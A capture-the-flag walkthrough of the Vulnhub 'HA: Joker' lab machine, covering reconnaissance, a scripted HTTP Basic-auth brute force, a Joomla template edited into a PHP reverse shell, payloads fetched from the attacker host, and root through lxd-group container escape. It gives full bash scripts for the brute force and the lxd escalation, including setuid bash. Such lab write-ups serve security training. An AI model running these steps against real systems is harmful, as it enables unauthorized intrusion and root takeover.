Vulnhub: HA: Joker, a detailed walkthrough
Joker
Author: jason_huawen
Target information
Name: HA: Joker
Address:
https://www.vulnhub.com/entry/ha-joker,379/
Identifying the target host IP address
┌──(root💀kali)-[~/Vulnhub/Joker]
└─# netdiscover -i eth1 -r 192.168.187.0/24
Currently scanning: 192.168.187.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.187.1 00:50:56:c0:00:01 1 60 VMware, Inc.
192.168.187.140 00:0c:29:ae:a1:68 1 60 VMware, Inc.
192.168.187.254 00:50:56:fd:07:6a 1 60 VMware, Inc.
Kali Linux's built-in netdiscover identifies the target as 192.168.187.140: the 00:0c:29 MAC prefix is the one VMware assigns to guest VMs, while the .1 and .254 hosts with 00:50:56 prefixes are the hypervisor's own virtual adapter and gateway.
Nmap scan
┌──(root💀kali)-[~/Vulnhub/Joker]
└─# nmap -sS -sV -sC -p- 192.168.187.140 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-23 22:58 EST
Nmap scan report for localhost (192.168.187.140)
Host is up (0.0015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ad:20:1f:f4:33:1b:00:70:b3:85:cb:87:00:c4:f4:f7 (RSA)
| 256 1b:f9:a8:ec:fd:35:ec:fb:04:d5:ee:2a:a1:7a:4f:78 (ECDSA)
|_ 256 dc:d7:dd:6e:f6:71:1f:8c:2c:2c:a1:34:6d:29:99:20 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: HA: Joker
|_http-server-header: Apache/2.4.29 (Ubuntu)
8080/tcp open http Apache httpd 2.4.29
|_http-title: 401 Unauthorized
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Please enter the password.
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 00:0C:29:AE:A1:68 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.10 seconds
Nmap shows three open TCP ports: 22 (OpenSSH 7.6p1), 80 (Apache 2.4.29 serving the "HA: Joker" landing page) and 8080 (Apache again, but answering 401 with the Basic-auth realm "Please enter the password."). That http-auth output on 8080 is what later turns into a credential brute-force.
Getting a shell
┌──(root💀kali)-[~/Vulnhub/Joker]
└─# nikto -h http://192.168.187.140
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.187.140
+ Target Hostname: 192.168.187.140
+ Target Port: 80
+ Start Time: 2023-02-23 23:06:16 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 1742, size: 5947314152e73, mtime: gzip
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST
+ /phpinfo.php: Output from the phpinfo() function was found.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2023-02-23 23:07:27 (GMT-5) (71 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
nikto reports directory indexing on /img. Browsing it, one image stands out, 100.jpg, so it was downloaded to Kali for a closer look.
┌──(root💀kali)-[~/Vulnhub/Joker]
└─# steghide extract -sf 100.jpg
Enter passphrase:
┌──(root💀kali)-[~/Vulnhub/Joker]
└─# stegseek 100.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.65% (133.0 MB)
[!] error: Could not find a valid passphrase.
┌──(root💀kali)-[~/Vulnhub/Joker]
└─# exiftool 100.jpg
ExifTool Version Number : 12.41
File Name : 100.jpg
Directory : .
File Size : 79 KiB
File Modification Date/Time : 2023:02:23 23:07:10-05:00
File Access Date/Time : 2023:02:23 23:07:40-05:00
File Inode Change Date/Time : 2023:02:23 23:07:10-05:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 3040
Image Height : 2036
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 3040x2036
Megapixels : 6.2
Neither steghide (stegseek, which defaults to rockyou.txt, found no passphrase) nor exiftool turned up anything of value in the image; the "100" in its name is the only lead, and it only makes sense after reading secret.txt below.
┌──(root💀kali)-[~/Vulnhub/Joker]
└─# gobuster dir -u http://192.168.187.140 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.187.140
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,html,sh,txt
[+] Timeout: 10s
===============================================================
2023/02/23 23:10:09 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 5954]
/img (Status: 301) [Size: 316] [--> http://192.168.187.140/img/]
/css (Status: 301) [Size: 316] [--> http://192.168.187.140/css/]
/secret.txt (Status: 200) [Size: 320]
/phpinfo.php (Status: 200) [Size: 94801]
/server-status (Status: 403) [Size: 280]
===============================================================
2023/02/23 23:11:50 Finished
===============================================================
┌──(root💀kali)-[~/Vulnhub/Joker]
└─# curl http://192.168.187.140/secret.txt
Batman hits Joker.
Joker: "Bats you may be a rock but you won't break me." (Laughs!)
Batman: "I will break you with this rock. You made a mistake now."
Joker: "This is one of your 100 poor jokes, when will you get a sense of humor bats! You are dumb as a rock."
Joker: "HA! HA! HA! HA! HA! HA! HA! HA! HA! HA! HA! HA!"
What is secret.txt for?
The text keeps saying "rock", which points at the rockyou.txt wordlist, and "one of your 100 poor jokes" suggests only the first 100 entries of that list are needed (the /img/100.jpg filename carries the same number).
Next, brute-force the HTTP Basic authentication on port 8080 with Burp Suite Intruder, assuming the username is joker. The Authorization header carries base64(username:password), so the Intruder payload needs a processing chain that prefixes each candidate with "joker:" and then base64-encodes the result; matching on anything other than a 401 response finds the hit.
Password: hannah
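The same brute-force as a script, added here as an example; it is not the author's Burp Intruder setup and not part of the original write-up. It assumes the target URL and the wordlist path are passed in the TARGET and WORDLIST environment variables, and that rockyou.txt has been unpacked (Kali ships it gzipped as /usr/share/wordlists/rockyou.txt.gz).

```shell
#!/usr/bin/env bash
# Added example (not the author's Burp Intruder setup): brute-force HTTP Basic
# auth with the first 100 entries of rockyou.txt, username joker.
# Assumed inputs: TARGET (e.g. http://192.168.187.140:8080/) and WORDLIST
# (an unpacked rockyou.txt), both supplied as environment variables.
set -u

# Basic auth carries base64("user:password") in the Authorization header;
# this is exactly the prefix + base64 payload-processing chain Burp needs.
basic_token() {   # $1 = user, $2 = password
    printf '%s:%s' "$1" "$2" | base64 | tr -d '\n'
}

# "One of your 100 poor jokes": keep only the first N entries of the list.
top_n_words() {   # $1 = wordlist file, $2 = N
    head -n "$2" "$1"
}

# Read candidate passwords from stdin, try each against URL $1 as user $2 and
# print the first one the server does not reject with 401. Anything else
# (200, 302, even 403) means the auth layer accepted the credentials.
basic_brute() {   # $1 = URL, $2 = user
    local url="$1" user="$2" pw code
    while IFS= read -r pw; do
        code=$(curl -s -o /dev/null -w '%{http_code}' \
                    -H "Authorization: Basic $(basic_token "$user" "$pw")" \
                    "$url" < /dev/null)
        if [ "$code" != "401" ]; then
            printf '%s\n' "$pw"
            return 0
        fi
    done
    return 1   # list exhausted without a hit
}

# Only fire when a target is given, so the functions can be sourced or tested.
if [ -n "${TARGET:-}" ]; then
    top_n_words "${WORDLIST:-/usr/share/wordlists/rockyou.txt}" 100 \
        | basic_brute "$TARGET" joker
fi
```

Run it as `TARGET=http://192.168.187.140:8080/ WORDLIST=/usr/share/wordlists/rockyou.txt bash brute.sh`. curl's own `-u joker:$pw` would do the encoding for you; it is spelled out here because the Intruder payload needs the same transformation, and because seeing the token makes the "why base64" step obvious.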
With Basic auth passed, the site on 8080 turns out to be Joomla. Its administrator back end lives at /administrator. Joomla itself has no factory-default administrator credentials (they are chosen during installation), but a quick search suggested trying joomla:joomla, and on this box it worked.
Inside the Joomla back end, open the template manager, edit the site template's index.php and replace its contents with a PHP reverse shell (shell.php).
After saving, click the template's Preview button: the template renders, the PHP runs, and a shell connects back to the listener.
┌──(root💀kali)-[~/Vulnhub/Joker]
└─# sudo nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.187.130] from (UNKNOWN) [192.168.187.140] 33146
Linux ubuntu 4.15.0-55-generic #60-Ubuntu SMP Tue Jul 2 18:22:20 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
21:02:42 up 1:16, 0 users, load average: 0.00, 0.01, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data),115(lxd)
/bin/sh: 0: can't access tty; job control turned off
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/$ cd /home
cd /home
www-data@ubuntu:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Oct 8 2019 .
drwxr-xr-x 22 root root 4.0K Oct 8 2019 ..
drwxr-xr-x 4 joker joker 4.0K Oct 8 2019 joker
www-data@ubuntu:/home$ cd joker
cd joker
www-data@ubuntu:/home/joker$ ls -alh
ls -alh
total 36K
drwxr-xr-x 4 joker joker 4.0K Oct 8 2019 .
drwxr-xr-x 3 root root 4.0K Oct 8 2019 ..
-rw------- 1 joker joker 31 Oct 8 2019 .bash_history
-rw-r--r-- 1 joker joker 220 Oct 8 2019 .bash_logout
-rw-r--r-- 1 joker joker 3.7K Oct 8 2019 .bashrc
drwx------ 2 joker joker 4.0K Oct 8 2019 .cache
drwxrwxr-x 3 joker joker 4.0K Oct 8 2019 .local
-rw------- 1 root root 91 Oct 8 2019 .mysql_history
-rw-r--r-- 1 joker joker 807 Oct 8 2019 .profile
-rw-r--r-- 1 joker joker 0 Oct 8 2019 .sudo_as_admin_successful
www-data@ubuntu:/home/joker$ cd /var
cd /var
www-data@ubuntu:/var$ ls -alh
ls -alh
total 48K
drwxr-xr-x 12 root root 4.0K Oct 8 2019 .
drwxr-xr-x 22 root root 4.0K Oct 8 2019 ..
drwxr-xr-x 2 root root 4.0K Oct 8 2019 backups
drwxr-xr-x 12 root root 4.0K Oct 8 2019 cache
drwxr-xr-x 43 root root 4.0K Oct 8 2019 lib
drwxrwsr-x 2 root staff 4.0K Apr 24 2018 local
lrwxrwxrwx 1 root root 9 Oct 8 2019 lock -> /run/lock
drwxrwxr-x 10 root syslog 4.0K Feb 23 19:35 log
drwxrwsr-x 2 root mail 4.0K Aug 5 2019 mail
drwxr-xr-x 2 root root 4.0K Aug 5 2019 opt
lrwxrwxrwx 1 root root 4 Oct 8 2019 run -> /run
drwxr-xr-x 4 root root 4.0K Oct 8 2019 spool
drwxrwxrwt 2 root root 4.0K Feb 23 19:35 tmp
drwxrwxr-x 3 root www-data 4.0K Oct 8 2019 www
www-data@ubuntu:/var$ cd backups
cd backups
www-data@ubuntu:/var/backups$ ls -alh
ls -alh
total 32K
drwxr-xr-x 2 root root 4.0K Oct 8 2019 .
drwxr-xr-x 12 root root 4.0K Oct 8 2019 ..
-rw-r--r-- 1 root lxd 18K Oct 8 2019 apt.extended_states.0
-rw-r--r-- 1 root root 1.9K Oct 8 2019 apt.extended_states.1.gz
www-data@ubuntu:/var/backups$ cd ..
cd ..
www-data@ubuntu:/var$ cd www
cd www
www-data@ubuntu:/var/www$ ls -alh
ls -alh
total 12K
drwxrwxr-x 3 root www-data 4.0K Oct 8 2019 .
drwxr-xr-x 12 root root 4.0K Oct 8 2019 ..
drwxrwxr-x 4 root www-data 4.0K Oct 8 2019 html
www-data@ubuntu:/var/www$ cd html
cd html
www-data@ubuntu:/var/www/html$ ls -alh
ls -alh
total 36K
drwxrwxr-x 4 root www-data 4.0K Oct 8 2019 .
drwxrwxr-x 3 root www-data 4.0K Oct 8 2019 ..
-rwxrwxr-x 1 root www-data 225 Jun 10 2016 .htaccess
drwxr-xr-x 2 root root 4.0K Oct 9 2019 css
drwxr-xr-x 2 root root 4.0K Oct 8 2019 img
-rw-r--r-- 1 root root 5.9K Oct 8 2019 index.html
-rwxrwxr-x 1 root www-data 21 Oct 8 2019 phpinfo.php
-rw-r--r-- 1 root root 320 Oct 8 2019 secret.txt
www-data@ubuntu:/var/www/html$ cat .htaccess
cat .htaccess
<IfModule mod_rewrite.c>
RewriteEngine On
SetEnv HTTP_MOD_REWRITE On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php?/$1 [L]
</IfModule>
www-data@ubuntu:/var/www/html$ cd /tmp
cd /tmp
www-data@ubuntu:/tmp$ wget http://192.168.187.130:8000/linpeas.sh
wget http://192.168.187.130:8000/linpeas.sh
--2023-02-23 21:04:48-- http://192.168.187.130:8000/linpeas.sh
Connecting to 192.168.187.130:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 765824 (748K) [text/x-sh]
Saving to: 'linpeas.sh'
linpeas.sh 100%[===================>] 747.88K --.-KB/s in 0.006s
2023-02-23 21:04:48 (113 MB/s) - 'linpeas.sh' saved [765824/765824]
www-data@ubuntu:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@ubuntu:/tmp$ ./linpeas.sh
./linpeas.sh
(linpeas.sh banner; the rest of its output is truncated in the original)
Privilege escalation
linpeas.sh highlights that www-data belongs to the lxd group (it was already visible in the id output of the reverse shell: groups=33(www-data),115(lxd)). Any member of that group can talk to the LXD socket and create a privileged container with the host's root filesystem mounted inside it, which is effectively root on the host, so that is the route taken. The Alpine image used below was prepared on the attacker machine (for example with lxd-alpine-builder) and served over HTTP on port 8000 alongside linpeas.sh.
www-data@ubuntu:/tmp$ wget http://192.168.187.130:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
--2023-02-23 21:10:48-- http://192.168.187.130:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
Connecting to 192.168.187.130:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3259593 (3.1M) [application/gzip]
Saving to: 'alpine-v3.13-x86_64-20210218_0139.tar.gz'
alpine-v3.13-x86_64 100%[===================>] 3.11M --.-KB/s in 0.01s
2023-02-23 21:10:48 (252 MB/s) - 'alpine-v3.13-x86_64-20210218_0139.tar.gz' saved [3259593/3259593]
www-data@ubuntu:/tmp$ lxc image import alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
lxc image import alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
www-data@ubuntu:/tmp$ lxc image list
lxc image list
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| myimage | cd73881adaac | no | alpine v3.13 (20210218_01:39) | x86_64 | 3.11MB | Feb 24, 2023 at 5:11am (UTC) |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
www-data@ubuntu:/tmp$ lxd init
lxd init
Would you like to use LXD clustering? (yes/no) [default=no]:
Do you want to configure a new storage pool? (yes/no) [default=yes]:
Name of the new storage pool [default=default]:
The requested storage pool "default" already exists. Please choose another name.
(the prompt and the "already exists" answer repeat several times in the original until a new name is entered)
Name of the new storage pool [default=default]: jason
Name of the storage backend to use (dir, zfs) [default=zfs]:
Create a new ZFS pool? (yes/no) [default=yes]:
Would you like to use an existing block device? (yes/no) [default=no]:
Size in GB of the new loop device (1GB minimum) [default=15GB]:
Would you like to connect to a MAAS server? (yes/no) [default=no]:
Would you like to create a new local network bridge? (yes/no) [default=yes]:
What should the new bridge be called? [default=lxdbr0]:
The requested network bridge "lxdbr0" already exists. Please choose another name.
What should the new bridge be called? [default=lxdbr0]: testbr
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
Would you like LXD to be available over the network? (yes/no) [default=no]:
Would you like stale cached images to be updated automatically? (yes/no) [default=yes]
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]:
Note: the "already exists" answers for the default storage pool and for lxdbr0 show that LXD had already been initialised on this host, so lxd init was not actually needed; running it anyway created an extra 15 GB ZFS loop-backed pool and a second bridge, avoidable noise on a real engagement. lxd init is only required when lxc image import fails because no storage pool exists yet.
www-data@ubuntu:/tmp$ lxc init myimage ignite -c security.privileged=true
lxc init myimage ignite -c security.privileged=true
Creating ignite
www-data@ubuntu:/tmp$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite
www-data@ubuntu:/tmp$ lxc start ignite
lxc start ignite
www-data@ubuntu:/tmp$ lxc exec ignite /bin/sh
lxc exec ignite /bin/sh
~ # cd /mnt/root
cd /mnt/root
/mnt/root # ls -alh
ls -alh
total 947M
drwxr-xr-x 22 root root 4.0K Oct 8 2019 .
drwxr-xr-x 3 root root 3 Feb 24 05:14 ..
drwxr-xr-x 2 root root 4.0K Oct 8 2019 bin
drwxr-xr-x 3 root root 4.0K Oct 8 2019 boot
drwxr-xr-x 18 root root 3.8K Feb 24 03:35 dev
drwxr-xr-x 85 root root 4.0K Oct 8 2019 etc
drwxr-xr-x 3 root root 4.0K Oct 8 2019 home
lrwxrwxrwx 1 root root 33 Oct 8 2019 initrd.img -> boot/initrd.img-4.15.0-55-generic
lrwxrwxrwx 1 root root 33 Oct 8 2019 initrd.img.old -> boot/initrd.img-4.15.0-55-generic
drwxr-xr-x 20 root root 4.0K Oct 8 2019 lib
drwxr-xr-x 2 root root 4.0K Oct 8 2019 lib64
drwx------ 2 root root 16.0K Oct 8 2019 lost+found
drwxr-xr-x 4 root root 4.0K Oct 8 2019 media
drwxr-xr-x 2 root root 4.0K Aug 5 2019 mnt
drwxr-xr-x 3 root root 4.0K Oct 8 2019 opt
dr-xr-xr-x 264 root root 0 Feb 24 03:35 proc
drwx------ 3 root root 4.0K Oct 8 2019 root
drwxr-xr-x 23 root root 700 Feb 24 05:13 run
drwxr-xr-x 2 root root 4.0K Oct 8 2019 sbin
drwxr-xr-x 2 root root 4.0K Aug 5 2019 srv
-rw------- 1 root root 947.2M Oct 8 2019 swapfile
dr-xr-xr-x 13 root root 0 Feb 24 03:35 sys
drwxrwxrwt 12 root root 4.0K Feb 24 05:09 tmp
drwxr-xr-x 10 root root 4.0K Oct 8 2019 usr
drwxr-xr-x 12 root root 4.0K Oct 8 2019 var
lrwxrwxrwx 1 root root 30 Oct 8 2019 vmlinuz -> boot/vmlinuz-4.15.0-55-generic
lrwxrwxrwx 1 root root 30 Oct 8 2019 vmlinuz.old -> boot/vmlinuz-4.15.0-55-generic
/mnt/root # cd root
cd root
/mnt/root/root # ls -alh
ls -alh
total 24K
drwx------ 3 root root 4.0K Oct 8 2019 .
drwxr-xr-x 22 root root 4.0K Oct 8 2019 ..
-rw-r--r-- 1 root root 3.0K Apr 9 2018 .bashrc
drwxr-xr-x 3 root root 4.0K Oct 8 2019 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 1003 Oct 8 2019 final.txt
/mnt/root/root # cat final.txt
cat final.txt
██╗ ██████╗ ██╗ ██╗███████╗██████╗
██║██╔═══██╗██║ ██╔╝██╔════╝██╔══██╗
██║██║ ██║█████╔╝ █████╗ ██████╔╝
██ ██║██║ ██║██╔═██╗ ██╔══╝ ██╔══██╗
╚█████╔╝╚██████╔╝██║ ██╗███████╗██║ ██║
╚════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
!! Congrats you have finished this task !!
Contact us here:
Hacking Articles : https://twitter.com/rajchandel/
Aarti Singh: https://in.linkedin.com/in/aarti-singh-353698114
Privilege escalation succeeded and the root flag was obtained.
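The lxd-group escalation above as one script, added as an example and not part of the original write-up. It starts with the check that makes the technique applicable (membership in the lxd group, as seen in the id output) and then runs the same lxc sequence: import the image, create a privileged container, mount the host's / into it, start it and run commands inside. Assumed: the IMAGE environment variable points at an Alpine LXD image tarball already uploaded to the target; the alias, container and device names are arbitrary.

```shell
#!/usr/bin/env bash
# Added example: the lxd-group privilege escalation as a script, preceded by
# the precondition check. Not from the original write-up. Assumed: IMAGE is
# the path of an Alpine LXD image tarball already on the target.
set -u

# The technique only works for members of the lxd group: the LXD socket lets
# them create privileged containers, which is root on the host. $1 is id(1)
# output, e.g. "uid=33(www-data) gid=33(www-data) groups=33(www-data),115(lxd)".
in_lxd_group() {
    case "$1" in
        *"(lxd)"*) return 0 ;;
        *) return 1 ;;
    esac
}

# Import the image, create a privileged container, mount the host root into
# it and start it. $1 = image tarball, $2 = alias, $3 = container, $4 = mount path.
lxd_privesc_setup() {
    local image="$1" img_alias="$2" name="$3" mnt="$4"
    lxc image import "$image" --alias "$img_alias"
    # security.privileged=true: container root is real uid 0, no uid mapping
    lxc init "$img_alias" "$name" -c security.privileged=true
    # the whole host filesystem appears under $mnt, writable as uid 0
    lxc config device add "$name" hostroot disk source=/ path="$mnt" recursive=true
    lxc start "$name"
}

# Run one shell command inside the container (the host tree is at the mount path).
lxd_privesc_exec() {   # $1 = container, $2 = shell command
    lxc exec "$1" -- /bin/sh -c "$2"
}

# Alternative to reading files through the container: make the host's bash
# setuid root, after which a plain "/bin/bash -p" on the host is a root shell.
lxd_privesc_suid_bash() {   # $1 = container, $2 = mount path
    lxd_privesc_exec "$1" "chown root:root $2/bin/bash && chmod 4755 $2/bin/bash"
}

if [ -n "${IMAGE:-}" ]; then
    in_lxd_group "$(id)" || { echo "not in the lxd group, technique does not apply" >&2; exit 1; }
    lxd_privesc_setup "$IMAGE" myimage ignite /mnt/root
    lxd_privesc_exec ignite 'cat /mnt/root/root/final.txt'
fi
```

For an interactive session use `lxc exec ignite /bin/sh` as in the transcript. When finished, `lxc stop ignite`, `lxc delete ignite` and `lxc image delete myimage` remove the container and image from the host.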
Lessons learned
- The hardest part of this box is the HTTP Basic authentication on port 8080: the username has to be guessed (joker), and the wordlist only comes from reading secret.txt correctly (the first 100 entries of rockyou.txt). Burp Suite Intruder then needs a payload-processing chain that prefixes each candidate with "joker:" and base64-encodes the result, because that is what the Authorization: Basic header carries.
- Joomla's administrator back end is at /administrator. Joomla has no factory-default credentials (they are chosen at install time); on this box the admin account was joomla:joomla.